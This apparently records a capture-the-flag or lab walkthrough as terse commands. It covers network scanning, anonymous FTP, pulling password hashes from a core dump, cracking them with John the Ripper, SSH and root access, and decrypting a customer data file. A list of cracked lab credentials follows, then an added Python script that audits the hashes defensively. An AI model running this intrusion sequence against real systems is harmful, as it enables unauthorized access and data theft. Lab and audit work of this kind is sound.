nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.110
firefox 192.168.1.110
[+]kate -> make list of possible usernames // lastF, fLast
ftp 192.168.1.110 // Username: anonymous. Password: [Blank]
ls -a
cd download
ls -a
cd etc
ls -a
get core
exit
strings core
[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is on its own line -> Save. Filename: shadow
cd tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
john
./john --rules --wordlist=/root/passwords /root/shadow // Password: root:Complexity & ccoffee:Diatomaceous
ssh ccoffee@192.168.1.110 // Password: Diatomaceous
ls -a
cd ..
ls -a
cd root/
ls -a
cd .save/
su // Password: Complexity
cd .save/
ls -a
cat copy.sh
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
ls -a
cat customer_account.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------
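Added example, not part of the original notes: a defender-side audit of the shadow entries listed under Users, flagging the MD5-crypt ($1$) scheme and the missing or 99999-day maximum password age that made the wordlist run practical. The names classify_hash and audit and the 365-day threshold are assumptions chosen for this example.

```python
# Added example: audit shadow(5) entries; scheme ids follow crypt(5).
WEAK = {"1": "md5crypt"}
STRONG = {"2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
          "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
MAX_AGE_DAYS = 365  # assumed policy threshold, not from the page

# The four entries listed under "Users" on this page.
SAMPLE_SHADOW = """\
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
"""

def classify_hash(pw):
    """Return (scheme_name, is_weak) for the password field of one entry."""
    if pw == "":
        return ("empty password", True)
    if pw.startswith(("!", "*")):
        return ("locked", False)
    if not pw.startswith("$"):
        return ("descrypt or unknown", True)
    scheme = pw.split("$")[1]
    if scheme in WEAK:
        return (WEAK[scheme], True)
    return (STRONG.get(scheme, "unknown $" + scheme + "$"), scheme not in STRONG)

def audit(shadow_text):
    """Map each user to a list of findings; an empty list means no finding."""
    report = {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError("malformed shadow entry: %r" % fields[0])
        user, pw, max_age = fields[0], fields[1], fields[4]
        name, weak = classify_hash(pw)
        findings = []
        if weak:
            findings.append("weak hash scheme: " + name)
        if name != "locked" and (max_age == "" or int(max_age) > MAX_AGE_DAYS):
            findings.append("no effective maximum password age")
        report[user] = findings
    return report

if __name__ == "__main__":
    for user, findings in audit(SAMPLE_SHADOW).items():
        print(user, "->", "; ".join(findings) or "ok")
```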